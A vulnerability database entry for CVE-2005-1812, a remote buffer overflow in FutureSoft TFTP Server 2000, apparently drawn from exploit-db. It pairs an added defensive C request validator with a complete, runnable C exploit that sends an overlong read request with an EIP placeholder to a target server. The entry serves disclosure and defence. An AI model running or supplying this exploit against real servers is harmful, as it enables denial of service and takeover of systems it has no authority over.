FutureSoft TFTP Server 2000 Remote Buffer Overflow Vulnerability

Vulnerability ID 1108836 Vulnerability type Buffer overflow
Published 2005-06-02 Updated 2005-10-20
CVE ID CVE-2005-1812
CNNVD-ID CNNVD-200506-015
Platform Windows CVSS score 10.0
|Source
https://www.exploit-db.com/exploits/1027
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-015
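|Vulnerability details
TFTP Server 2000 is a TFTP server for Windows that supports all RFC 1350-compatible clients. It contains a buffer overflow in its handling of malformed file access requests, which a remote attacker may be able to exploit to execute arbitrary code on the TFTP server. An overlong filename or type field in a file access request overflows a buffer in the server, allowing the attacker to execute arbitrary code and take control of the server.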
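A server-side or inline check for the condition described above, as an added example that is not part of the original entry or of any vendor code: it validates an RFC 1350 read/write request and rejects overlong or unterminated filename and mode fields before anything is copied. The function names, the verdict enum and the 255-byte filename limit are assumptions chosen for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define TFTP_MAX_NAME 255 /* assumed policy limit; RFC 1350 sets none */
#define TFTP_MAX_MODE 8   /* strlen("netascii"), the longest valid mode */

enum tftp_verdict { TFTP_OK, TFTP_TRUNCATED, TFTP_BAD_OPCODE,
                    TFTP_UNTERMINATED, TFTP_BAD_NAME, TFTP_BAD_MODE };

/* Length of the NUL-terminated field at p, or -1 if no NUL within n bytes. */
static long field_len(const unsigned char *p, size_t n) {
    const unsigned char *nul = memchr(p, 0, n);
    return nul ? (long)(nul - p) : -1;
}

/* RFC 1350 modes, matched case-insensitively. */
static int mode_known(const unsigned char *m, size_t len) {
    static const char *modes[] = { "netascii", "octet", "mail" };
    for (size_t i = 0; i < 3; i++) {
        size_t j = 0;
        if (strlen(modes[i]) != len) continue;
        while (j < len && tolower(m[j]) == modes[i][j]) j++;
        if (j == len) return 1;
    }
    return 0;
}

enum tftp_verdict tftp_check_request(const unsigned char *pkt, size_t len) {
    if (len < 4) return TFTP_TRUNCATED;
    unsigned op = ((unsigned)pkt[0] << 8) | pkt[1];
    if (op != 1 && op != 2) return TFTP_BAD_OPCODE;       /* RRQ=1, WRQ=2 */
    long name = field_len(pkt + 2, len - 2);
    if (name < 0) return TFTP_UNTERMINATED;
    if (name == 0 || name > TFTP_MAX_NAME) return TFTP_BAD_NAME;
    size_t off = 2 + (size_t)name + 1;                    /* start of mode */
    if (off >= len) return TFTP_TRUNCATED;
    long mode = field_len(pkt + off, len - off);
    if (mode < 0) return TFTP_UNTERMINATED;
    if (mode > TFTP_MAX_MODE || !mode_known(pkt + off, (size_t)mode))
        return TFTP_BAD_MODE;
    return TFTP_OK;
}

int main(void) {
    /* Constructed sample: a well-formed RRQ for "boot.img" in octet mode. */
    static const unsigned char ok[] = "\x00\x01" "boot.img\0octet";
    printf("verdict=%d\n", tftp_check_request(ok, sizeof ok));
    return 0;
}
```

Every length is derived from the received datagram size, so a field with no terminator is rejected instead of being scanned past the end of the packet.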
|Exploit
/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: [email protected]
* Credit to kozan
* Usage:tftp_exp <targetIp> [targetPort]
*
*/

/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"\x00\x01"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x58\x58\x58\x58" /* EIP */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
"\x69\x00";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent *pTarget;
        struct sockaddr_in sock;
        SOCKET mysocket;
        int destPORT = 69;//Default to 69

        if (argc < 2){
                printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");
                printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
                printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");
                printf("Exploit coded By ATmaCA\n");
                printf("Web: atmacasoft.com && spyinstructors.com\n");
                printf("E-Mail: [email protected]\n");
                printf("Credit to kozan\n");
                printf("Usage:tftp_exp <targetIp> [targetPort]\n");
                return 1;
        }
        if (argc==3)
                destPORT=atoi(argv[2]);

        printf("Requesting Winsock...\n");
        wVersionRequested = MAKEWORD(1, 1);
        /* WSAStartup returns 0 on success and a positive error code on failure */
        if (WSAStartup(wVersionRequested, &wsaData) != 0) {
                printf("No winsock suitable version found!");
                return 1;
        }
        mysocket = socket(AF_INET, SOCK_DGRAM, 0);
        if(mysocket==INVALID_SOCKET){
                printf("Can't create UDP socket\n");
                exit(1);
        }
        printf("Resolving Hostnames...\n");
        /* The target host is argv[1]; argv[2] is the optional port */
        if ((pTarget = gethostbyname(argv[1])) == NULL){
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }
        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons(destPORT);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        Sleep(10);

        printf("RRQ->Sending packet. Size: %d\n",(int)sizeof(expbuffer));
        /* Send exactly the buffer; sizeof already includes the trailing NUL */
        if (send(mysocket,expbuffer, (int)sizeof(expbuffer), 0) == -1){
                printf("Error sending packet\n");
                closesocket(mysocket);
                exit(1);
        }
        printf("Packet sent........\n");
        printf("Success.\n");

        closesocket(mysocket);
        WSACleanup();
        return 0;
}

// milw0rm.com [2005-06-02]
|References

Source: BID
Name: 13821
Link: http://www.securityfocus.com/bid/13821
Source: MISC
Link: http://www.security.org.sg/vuln/tftp2000-1001.html
Source: SECTRACK
Name: 1014079
Link: http://securitytracker.com/id?1014079
Source: SECUNIA
Name: 15539
Link: http://secunia.com/advisories/15539
